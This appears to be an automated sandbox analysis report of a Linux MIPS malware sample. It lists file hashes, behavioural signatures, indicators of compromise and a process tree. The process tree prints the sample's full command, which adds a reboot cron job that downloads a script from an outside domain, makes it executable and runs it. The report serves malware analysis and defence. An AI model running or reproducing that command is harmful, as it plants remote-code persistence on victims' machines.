Analysis
max time kernel: 142s
max time network: 139s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 27-10-2024 02:49
Static task: static1
Behavioral task: behavioral1
Sample: b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
Resource: debian9-mipsel-20240611-en
General
Target: b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
Size: 99KB
MD5: 2ebce2c623cee35100ce645095e0e17a
SHA1: f8cf8d0db764834f60325110897e8a7cabc96fc4
SHA256: b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
SHA512: 1c3591b36a1ba39c07054af82aff3311f56c051399d027e800618831f40b2e0b3f121118dbe4a81eb2ec3f4203b127887e05c7164c3af8afd08b10a12d27d00e
SSDEEP: 1536:IHC8aIWiD9AW0FLQ4LBOe+h2s9ieZWUHy6Yb7SWTnvgkwBu:IHC8HWMxhlUeSl7wBu
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 1 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.

Renames itself (1 IoCs)
  Processes:
    pid   process
    709   b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf

Unexpected DNS network traffic destination (1 IoCs)
  Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  Processes:
    description      ioc
    Destination IP   168.235.111.72

Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes:
    description                    ioc                                   process
    File opened for modification   /var/spool/cron/crontabs/tmp.DDLmqg   crontab

Changes its process name (1 IoCs)
  Processes:
    description                                                        ioc            pid   process
    Changes the process name, possibly in an attempt to hide itself    [watchdog/0]   709   b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf

Reads runtime system information
  Processes:
    description               ioc                 process
    File opened for reading   /proc/filesystems   crontab
    File opened for reading   /proc/filesystems   crontab
    File opened for reading   /proc/mounts        b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
Processes

/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
  command line: /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
  PID: 709
  - Renames itself
  - Changes its process name
  - Reads runtime system information

  /bin/sh
    command line: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    PID: 711
    - File and Directory Permissions Modification

    /usr/bin/crontab
      command line: crontab -
      PID: 713
      - Creates/modifies Cron job
      - Reads runtime system information

    /usr/bin/crontab
      command line: crontab -l
      PID: 714
      - Reads runtime system information
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 306B
MD5: 8c9ff02103c706a091467f66f463d116
SHA1: 8389f2e1cb1e2bb7034773f88119c45482870a46
SHA256: e001ff127ebf9d6ceed98f1c5b5326b833864a8473b0e072b64de7315ed8c6f4
SHA512: da6e9fa9b71115b07d4e4a561800b89732fc20031c955ad9aa11befda0c2567547aa324fb47ad3db536a9dfb93173352d3c3613124b13ae866ac44d77cf8e555